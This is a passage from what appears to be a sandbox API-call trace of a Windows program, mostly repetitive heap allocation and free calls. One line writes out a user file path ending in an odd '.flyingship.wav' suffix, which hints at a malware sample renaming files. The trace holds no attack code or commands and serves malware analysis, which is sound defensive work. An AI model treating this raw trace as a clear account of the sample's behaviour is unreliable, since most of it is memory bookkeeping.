HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.flyingship.wav\r\n", cchWideChar=99, lpMultiByteStr=0x8e8320, cbMultiByte=99, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.flyingship.wav\r\n", lpUsedDefaultChar=0x0) returned 99 [0185.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0185.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0185.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8320 | out: hHeap=0x8a0000) returned 1 [0185.066] WriteFile (in: hFile=0x138, lpBuffer=0x906f38*, nNumberOfBytesToWrite=0x62, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x906f38*, lpNumberOfBytesWritten=0x87f43c*=0x62, lpOverlapped=0x0) returned 1 [0185.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0185.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0185.066] CloseHandle (hObject=0x138) returned 1 [0185.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0185.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0185.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0185.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0185.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0185.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0185.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0185.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0185.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0185.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0185.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0185.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0185.069] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0185.069] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0185.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0185.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0185.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0185.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0185.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0185.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0185.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0185.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0185.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0185.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0185.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0185.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0185.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0185.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0185.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0185.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0185.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0185.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0185.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0185.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0185.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0185.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0185.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0185.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0185.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0185.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0185.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0185.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0185.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0185.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0185.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0185.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0185.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0185.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0185.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0185.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0185.070] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0185.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0185.070] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0185.070] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0185.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0185.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0185.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0185.070] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0185.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0185.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0185.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0185.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1890 [0185.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0185.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0185.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0185.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0185.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0185.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0185.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0185.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba270 [0185.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0185.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0185.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0185.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0185.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0185.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0185.071] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0185.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0185.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0185.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0185.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0185.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0185.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0185.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0185.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0185.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0185.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0185.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0185.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0185.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0185.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0185.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0185.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0185.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0185.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0185.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0185.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0185.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0185.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0185.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0185.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0185.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0185.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0185.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0185.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0185.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0185.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0185.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0185.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0185.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0185.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0185.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0185.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0185.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0185.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0185.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0185.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0185.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0185.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0185.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0185.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0185.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0185.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0185.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0185.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0185.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0185.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0185.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0185.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0185.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0185.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0185.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0185.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0185.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0185.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0185.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0185.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0185.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0185.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0185.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0185.074] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0185.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0185.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0185.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0185.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0185.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0185.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0185.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0185.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0185.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0185.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0185.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0185.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0185.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0185.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0185.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0185.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0185.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0185.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0185.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0185.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0185.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0185.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0185.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0185.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0185.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0185.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0185.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0185.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0185.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0185.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0185.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0185.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0185.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0185.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0185.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0185.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0185.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0185.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0185.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0185.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0185.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0185.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0185.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0185.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0185.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0185.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0185.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0185.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0185.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0185.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0185.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0185.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0185.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0185.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0185.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0185.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0185.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0185.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0185.076] HeapFree (in: 